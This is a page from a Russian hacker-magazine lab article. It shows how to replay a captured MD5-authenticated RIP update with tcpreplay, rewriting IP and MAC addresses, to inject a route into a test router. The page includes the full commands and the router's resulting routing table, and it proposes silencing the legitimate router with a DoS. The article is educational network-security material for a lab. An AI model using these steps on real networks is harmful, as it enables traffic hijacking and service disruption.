Издательский дом ООО "Гейм Лэнд"СПЕЦВЫПУСК ЖУРНАЛА ХАКЕР #66, МАЙ 2006 г.

лабораторная работа

КОНСТАНТИН ГАВРИЛЕНКО

Спецвыпуск: Хакер, номер #066, стр. 066-018-11


Включив поддержку MD5-аутентификации на нашей тестовой сети, посмотрим, что можно сделать.

Листинг 28. Перехват пакета, оповещающего о нашем тестовом маршруте 192.168.10.0/24

arhontus / # tcpdump -n -i eth0 port 520 and host 192.168.69.100 -w ripauth.pcap

Листинг 29. Проверка того, что пакет содержит необходимый маршрут, с использованием tethereal (tcpdump не в состоянии правильно отобразить информацию из аутентифицированного пакета)

arhontus / # tethereal -V -n -r ./ripauth.pcap

IP Address: 192.168.10.0, Metric: 1

Address Family: IP (2)

Route Tag: 0

IP Address: 192.168.10.0 (192.168.10.0)

Netmask: 255.255.255.0 (255.255.255.0)

Next Hop: 0.0.0.0 (0.0.0.0)

Metric: 1

IP Address: 192.168.7.0, Metric: 1

Address Family: IP (2)

Route Tag: 0

IP Address: 192.168.7.0 (192.168.7.0)

Netmask: 255.255.255.0 (255.255.255.0)

Next Hop: 0.0.0.0 (0.0.0.0)

Metric: 1

Теперь пытаемся изменить адрес отправителя на свой. Для этого берем программу netdude или совершаем подмену напрямую в tcpreplay. Любители графического интерфейса по достоинству оценят первый вариант, но не стоит забывать, что скорее всего у нас не будет X’ов на удаленной машине. Так что лучше проводить модификацию в консоли используя встроенные возможности tcpreplay. Настоящие асы всегда могут воспользоваться HEX-редактором для модификации пакета напрямую, только не забудь поменять проверочную сумму IPV4.

При помощи опции -e в пакете переписываются адреса отправителя и получателя. Если операция выполнится, суммы проверки будут изменены автоматически. Меняем адреса отправителя (с 192.168.69.100 на 192.168.69.102) и получателя (с 224.0.0.9 на 192.168.69.36). А при помощи опций -k и -I изменяем MAC-адреса, взятые из ARP-таблицы, иначе в пакете останется ARP-адрес многоадресной рассылки 01:00:5e:00:00:09, соответствующий 224.0.0.9.

arhontus / # tcpreplay -i eth0 -e 192.168.69.102:192.168.69.36 -k 00:00:0b:56:15:a2 -I 00:00:0a:43:12:a4 ripauth.pcap

Листинг 31. Изменение таблицы маршрутизации на атакуемом хосте

#sh ip route rip

R 192.168.10.0/24 [120/1] via 192.168.69.36, 00:00:02, Ethernet0/0

[120/1] via 192.168.69.102, 00:00:03, Ethernet0/0

R 192.168.7.0/24 [120/1] via 192.168.69.36, 00:00:02, Ethernet0/0

[120/1] via 192.168.69.102, 00:00:03, Ethernet0/0

Маршрут был принят, но оказался вторичным, чего и следовало ожидать. Теперь заставим молчать маршрутизатор, посылающий легитимные маршруты, и одновременно будем посылать пакеты обновления на атакуемый маршрутизатор. Через три минуты наш маршрут получит предпочтение. Единственный момент, который стоит упомянуть: в течение этого времени трафик перестанет ходить через легитимный маршрутизатор, который DOS’ится...

Назад на стр. 066-018-10  Содержание  Вперед на стр. 066-018-12